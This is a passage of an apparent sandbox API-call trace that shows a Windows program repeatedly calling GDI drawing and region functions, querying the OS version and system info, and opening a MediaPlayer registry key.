lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.559] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.559] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.559] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.559] BeginPath (hdc=0x0) returned 0 [0017.559] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.559] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.559] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.559] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.559] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.559] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.559] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.559] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.559] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3104027d [0017.559] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3b040713 [0017.559] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a69 [0017.559] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a6a [0017.559] CombineRgn (hrgnDst=0x1040a69, hrgnSrc1=0x3104027d, hrgnSrc2=0x3b040713, iMode=1) returned 1 [0017.559] CombineRgn (hrgnDst=0x1040a6a, hrgnSrc1=0x3104027d, hrgnSrc2=0x3b040713, iMode=4) returned 2 [0017.559] CreateSolidBrush (color=0xff) returned 0x2100a68 [0017.559] CreateSolidBrush (color=0xff0000) returned 0x1100a6b [0017.559] DeleteObject (ho=0x1100a6b) returned 1 [0017.559] DeleteObject (ho=0x3b040713) returned 1 [0017.559] DeleteObject (ho=0x3104027d) returned 1 [0017.559] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.559] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.559] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.559] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.560] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.560] BeginPath (hdc=0x0) returned 0 [0017.560] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.560] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.560] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.560] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.560] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.560] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.560] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.560] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.560] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3c040713 [0017.560] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3204027d [0017.560] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a6c [0017.560] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a6d [0017.560] CombineRgn (hrgnDst=0x1040a6c, hrgnSrc1=0x3c040713, hrgnSrc2=0x3204027d, iMode=1) returned 1 [0017.560] CombineRgn (hrgnDst=0x1040a6d, hrgnSrc1=0x3c040713, hrgnSrc2=0x3204027d, iMode=4) returned 2 [0017.560] CreateSolidBrush (color=0xff) returned 0x2100a6b [0017.560] CreateSolidBrush (color=0xff0000) returned 0x1100a6e [0017.560] DeleteObject (ho=0x1100a6e) returned 1 [0017.560] DeleteObject (ho=0x3204027d) returned 1 [0017.560] DeleteObject (ho=0x3c040713) returned 1 [0017.560] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.560] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.561] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.561] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.561] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.561] BeginPath (hdc=0x0) returned 0 [0017.561] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.561] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.561] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.561] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.561] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.561] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.561] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.561] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.561] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3304027d [0017.561] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3d040713 [0017.561] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a6f [0017.561] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a70 [0017.561] CombineRgn (hrgnDst=0x1040a6f, hrgnSrc1=0x3304027d, hrgnSrc2=0x3d040713, iMode=1) returned 1 [0017.561] CombineRgn (hrgnDst=0x1040a70, hrgnSrc1=0x3304027d, hrgnSrc2=0x3d040713, iMode=4) returned 2 [0017.561] CreateSolidBrush (color=0xff) returned 0x2100a6e [0017.561] CreateSolidBrush (color=0xff0000) returned 0x1100a71 [0017.561] DeleteObject (ho=0x1100a71) returned 1 [0017.561] DeleteObject (ho=0x3d040713) returned 1 [0017.561] DeleteObject (ho=0x3304027d) returned 1 [0017.561] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.562] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.562] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.562] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.562] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.562] BeginPath (hdc=0x0) returned 0 [0017.562] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.562] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.562] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.562] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.562] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.562] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.562] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.562] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.562] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3e040713 [0017.562] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3404027d [0017.562] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a72 [0017.562] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a73 [0017.562] CombineRgn (hrgnDst=0x1040a72, hrgnSrc1=0x3e040713, hrgnSrc2=0x3404027d, iMode=1) returned 1 [0017.562] CombineRgn (hrgnDst=0x1040a73, hrgnSrc1=0x3e040713, hrgnSrc2=0x3404027d, iMode=4) returned 2 [0017.562] CreateSolidBrush (color=0xff) returned 0x2100a71 [0017.562] CreateSolidBrush (color=0xff0000) returned 0x1100a74 [0017.562] DeleteObject (ho=0x1100a74) returned 1 [0017.562] DeleteObject (ho=0x3404027d) returned 1 [0017.562] DeleteObject (ho=0x3e040713) returned 1 [0017.562] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.562] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.563] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.563] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.563] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.563] BeginPath (hdc=0x0) returned 0 [0017.563] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.563] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.563] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.563] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.563] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.563] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.563] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.563] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.563] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3504027d [0017.563] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3f040713 [0017.563] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a75 [0017.563] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a76 [0017.563] CombineRgn (hrgnDst=0x1040a75, hrgnSrc1=0x3504027d, hrgnSrc2=0x3f040713, iMode=1) returned 1 [0017.563] CombineRgn (hrgnDst=0x1040a76, hrgnSrc1=0x3504027d, hrgnSrc2=0x3f040713, iMode=4) returned 2 [0017.563] CreateSolidBrush (color=0xff) returned 0x2100a74 [0017.563] CreateSolidBrush (color=0xff0000) returned 0x1100a77 [0017.563] DeleteObject (ho=0x1100a77) returned 1 [0017.563] DeleteObject (ho=0x3f040713) returned 1 [0017.563] DeleteObject (ho=0x3504027d) returned 1 [0017.563] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.563] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.563] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.564] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.564] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.564] BeginPath (hdc=0x0) returned 0 [0017.564] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.564] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.564] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.564] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.564] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.564] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.564] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.564] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.564] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40040713 [0017.564] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3604027d [0017.564] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a78 [0017.564] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a79 [0017.564] CombineRgn (hrgnDst=0x1040a78, hrgnSrc1=0x40040713, hrgnSrc2=0x3604027d, iMode=1) returned 1 [0017.564] CombineRgn (hrgnDst=0x1040a79, hrgnSrc1=0x40040713, hrgnSrc2=0x3604027d, iMode=4) returned 2 [0017.564] CreateSolidBrush (color=0xff) returned 0x2100a77 [0017.564] CreateSolidBrush (color=0xff0000) returned 0x1100a7a [0017.564] DeleteObject (ho=0x1100a7a) returned 1 [0017.564] DeleteObject (ho=0x3604027d) returned 1 [0017.564] DeleteObject (ho=0x40040713) returned 1 [0017.564] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.564] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.564] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.564] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.564] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.564] BeginPath (hdc=0x0) returned 0 [0017.565] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.565] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.565] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.565] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.565] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.565] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.565] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.565] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.565] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3704027d [0017.565] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x41040713 [0017.565] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a7b [0017.565] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a7c [0017.565] CombineRgn (hrgnDst=0x1040a7b, hrgnSrc1=0x3704027d, hrgnSrc2=0x41040713, iMode=1) returned 1 [0017.565] CombineRgn (hrgnDst=0x1040a7c, hrgnSrc1=0x3704027d, hrgnSrc2=0x41040713, iMode=4) returned 2 [0017.565] CreateSolidBrush (color=0xff) returned 0x2100a7a [0017.565] CreateSolidBrush (color=0xff0000) returned 0x1100a7d [0017.565] DeleteObject (ho=0x1100a7d) returned 1 [0017.565] DeleteObject (ho=0x41040713) returned 1 [0017.565] DeleteObject (ho=0x3704027d) returned 1 [0017.565] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.565] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.565] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.565] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.565] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.565] BeginPath (hdc=0x0) returned 0 [0017.565] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.565] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.565] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.565] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.565] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.565] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.566] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.566] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.566] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x42040713 [0017.566] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3804027d [0017.566] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a7e [0017.566] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a7f [0017.566] CombineRgn (hrgnDst=0x1040a7e, hrgnSrc1=0x42040713, hrgnSrc2=0x3804027d, iMode=1) returned 1 [0017.566] CombineRgn (hrgnDst=0x1040a7f, hrgnSrc1=0x42040713, hrgnSrc2=0x3804027d, iMode=4) returned 2 [0017.566] CreateSolidBrush (color=0xff) returned 0x2100a7d [0017.566] CreateSolidBrush (color=0xff0000) returned 0x1100a80 [0017.566] DeleteObject (ho=0x1100a80) returned 1 [0017.566] DeleteObject (ho=0x3804027d) returned 1 [0017.566] DeleteObject (ho=0x42040713) returned 1 [0017.566] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.566] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.566] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.566] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.566] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.566] BeginPath (hdc=0x0) returned 0 [0017.566] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.566] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.566] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.566] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.566] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.566] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.566] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.566] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.567] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3904027d [0017.567] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x43040713 [0017.567] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a81 [0017.567] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a82 [0017.567] CombineRgn (hrgnDst=0x1040a81, hrgnSrc1=0x3904027d, hrgnSrc2=0x43040713, iMode=1) returned 1 [0017.567] CombineRgn (hrgnDst=0x1040a82, hrgnSrc1=0x3904027d, hrgnSrc2=0x43040713, iMode=4) returned 2 [0017.567] CreateSolidBrush (color=0xff) returned 0x2100a80 [0017.567] CreateSolidBrush (color=0xff0000) returned 0x1100a83 [0017.567] DeleteObject (ho=0x1100a83) returned 1 [0017.567] DeleteObject (ho=0x43040713) returned 1 [0017.567] DeleteObject (ho=0x3904027d) returned 1 [0017.567] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.567] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.567] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.567] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.567] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.567] BeginPath (hdc=0x0) returned 0 [0017.567] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.567] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.567] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.567] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.567] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.567] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.567] RtlUnwind 